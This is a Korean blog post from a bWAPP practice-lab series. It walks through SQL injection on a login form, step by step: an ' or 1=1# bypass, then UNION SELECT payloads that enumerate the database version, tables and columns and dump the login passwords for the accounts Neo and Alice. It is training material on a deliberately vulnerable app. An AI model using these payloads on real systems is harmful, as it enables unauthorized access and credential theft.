` SQL Injection (Login Form/Hero)
[ 공격 주입 ]
입력 값 : ' or 1=1#
[ 컬럼 수 확인 ]
입력 값 : ' union select all 1,2,3,4#
[ 버전 정보 확인 ]
입력 값 : ' union select all 1,@@version,3, database()#
[ 테이블 이름 출력 ]
입력 값 : ' union select all 1, table_name,3,4 from information_schema.tables where table_schema='Bwapp' #
입력 값 : ' union select all 1, table_name,3,4 from information_schema.tables where table_schema='Bwapp' and table_name!='blog' #
입력 값 : ' union select all 1, table_name,3,4 from information_schema.tables where table_schema='Bwapp' and table_name!='blog' and table_name!='heroes' #
입력 값 : ' union select all 1, table_name,3,4 from information_schema.tables where table_schema='Bwapp' and table_name!='blog' and table_name!='heroes' and table_name!='movies' # [ heros 테이블의 컬럼 확인 ]
입력 값 : ' union select ALL 1,column_name,3,4 from information_schema.columns where table_name='heroes'#
[ id 컬럼 이후 컬럼 확인 ]
입력 값 : ' union select ALL 1,column_name,3,4 from information_schema.columns where table_name='heroes' and column_name!='id'#
입력 값 : ' union select all 1, id, 3, login from heroes #
[ Neo 계정 패스워드 출력 ]
입력 값 : ' union select 1, login, 3, password from heroes #
[ Neo 다음 계정 확인 ]
입력 값 : ' union select all 1, id, 3, login from heroes where login!='neo' #
[ Alice 계정 패스워드 출력 ]
입력 값 : ' union select 1, login, 3, password from heroes where login!='neo' #
Alice 계정의 패스워드 까지 확인 하였다.
`
'Web hacking' 카테고리의 다른 글
bWAPP 17. SQL Injection (CAPTCHA) (0) | 2022.02.10 |
---|---|
bWAPP 16. SQL Injection (AJAX JSON jQuery) (0) | 2022.02.10 |
bWAPP 15. SQL Injection (POST Select) (0) | 2022.02.07 |
bWAPP 14. SQL Injection (POST Search) (0) | 2022.02.06 |
bWAPP 13. SQL Injection (GET/Select) (0) | 2022.02.06 |